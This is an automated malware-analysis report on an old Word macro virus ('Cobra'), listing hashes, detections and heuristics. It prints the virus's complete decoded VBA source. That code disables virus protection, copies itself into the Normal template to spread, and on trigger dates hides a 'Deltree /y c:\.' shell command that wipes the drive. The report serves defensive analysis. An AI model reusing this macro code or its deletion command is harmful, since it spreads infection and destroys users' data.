Office (OLE) malware analysis — malicious · 922ee78feffbd2af

MALICIOUS

Office (OLE)

40.0 KB Created: 1999-10-14 15:14:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: f1ea95c727a411ae325923ce21ee7069 SHA-1: 9c27e0d4e18c689ee7618fcea0f14f46ae84759a SHA-256: 922ee78feffbd2afa994398e8bb95a9b1f1b17540276fef75bcb000b7443e3ae

340 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1137.001 DLL Search Order Hijacking

The sample is a malicious Office document containing VBA macros. The AutoOpen macro attempts to disable virus protection and then executes several functions: DelMac, TempCopy, ADocCopy, and DelCDrive. DelMac and the copy functions appear to be designed to remove or copy macros, potentially to establish persistence or evade detection by modifying the Normal template and the active document. The ClamAV detection of 'Doc.Trojan.Cobra-7' and 'Win.Trojan.DelTree-10' further supports its malicious nature.

Heuristics 7

ClamAV: Doc.Trojan.Cobra-7 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Cobra-7
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11054 bytes
SHA-256: `47a962d661bcdac8bf96f1cbdabb634419dbe5ad8bd95535f9a597b422423b3a`
Detection ClamAV: Win.Trojan.DelTree-10 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Cobra" 'Cobra Version 1.0C Sub AutoOpen() Options.VirusProtection = False Options.SaveNormalPrompt = False Options.ConfirmConversions = False Call DelMac Call TempCopy Call ADocCopy Call DelCDrive End Sub Sub DelMac() On Error Resume Next Set NTmp = NormalTemplate Set ADoc = ActiveDocument For i = 1 To NTmp.VBProject.VBComponents.Count NM = NTmp.VBProject.VBComponents(i).Name If (NM <> "Cobra") And (NM <> "ThisDocument") Then Application.OrganizerDelete Source:=NTmp.FullName, _ Name:=NM, Object:=wdOrganizerObjectProjectItems End If Next i For i = 1 To ADoc.VBProject.VBComponents.Count NM = ADoc.VBProject.VBComponents(i).Name If (NM <> "ThisDocument") And (NM <> "Cobra") And _ (NM <> "Reference to Normal") Then Application.OrganizerDelete Source:=ADoc.FullName, _ Name:=NM, Object:=wdOrganizerObjectProjectItems End If Next i End Sub Private Sub TempCopy() On Error Resume Next Application.OrganizerCopy Source:=ActiveDocument.FullName, _ Destination:=NormalTemplate.FullName, Name:="Cobra", _ Object:=wdOrganizerObjectProjectItems Templates(NormalTemplate.FullName).Save End Sub Private Sub ADocCopy() On Error Resume Next Application.OrganizerCopy Source:=NormalTemplate.FullName, _ Destination:=ActiveDocument.FullName, Name:="Cobra", _ Object:=wdOrganizerObjectProjectItems End Sub Private Sub DelCDrive() On Error Resume Next Dim DelOk As Boolean For i = 1 To 12 If Day(Now) = i And Month(Now) = i Then If i <= 4 Then If Left(Application.UserName, 1) <= Chr(100) Then DelOk = True End If End If If i > 4 And i <= 8 Then If Left(Application.UserName, 1) > Chr(100) _ And Left(Application.UserName, 1) <= Chr(200) Then DelOk = True End If End If If i > 8 And i <= 12 Then If Left(Application.UserName, 1) > Chr(200) _ And Left(Application.UserName, 1) <= Chr(255) Then DelOk = True End If End If End If Next If DelOk = True Then Call DelDir End If End Sub Sub AutoClose() On Error Resume Next TempCopy ADocCopy If ActiveDocument.Saved = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End If End Sub Sub DelDir() On Error Resume Next Dim MP, MN MP = "c:\" MN = Dir(MP, vbDirectory) Do While MN <> "" If MN <> "." And MN <> ".." Then If (GetAttr(MP & MN) And vbDirectory) = vbDirectory Then If UCase(Left(MN, 1)) = UCase(Left(Application.UserName, 1)) Then Shell "Deltree /y c:\.", vbHide End If End If End If MN = Dir Loop End Sub Sub FileNew() On Error Resume Next Call DelMac Call TempCopy Call ADocCopy Dialogs(wdDialogFileNew).Show End Sub Sub FileExit() On Error Resume Next Call DelMac Call TempCopy Call ADocCopy End Sub ' Processing file: /opt/analyzer/scan_staging/4cae7df50dda41a69dab4e2e3facd3d1.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 1120 bytes ' Macros/VBA/Cobra - 5403 bytes ' Line #0: ' QuoteRem 0x0000 0x0012 "Cobra Version 1.0C" ' Line #1: ' FuncDefn (Sub AutoOpen()) ' Line #2: ' LitVarSpecial (False) ' Ld Options ' MemSt VirusProtection ' Line #3: ' LitVarSpecial (False) ' Ld Options ' MemSt SaveNormalPrompt ' Line #4: ' LitVarSpecial (False) ' Ld Options ' MemSt ConfirmConversions ' Line #5: ' ArgsCall (Call) DelMac 0x0000 ' Line #6: ' ArgsCall (Call) Temp ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.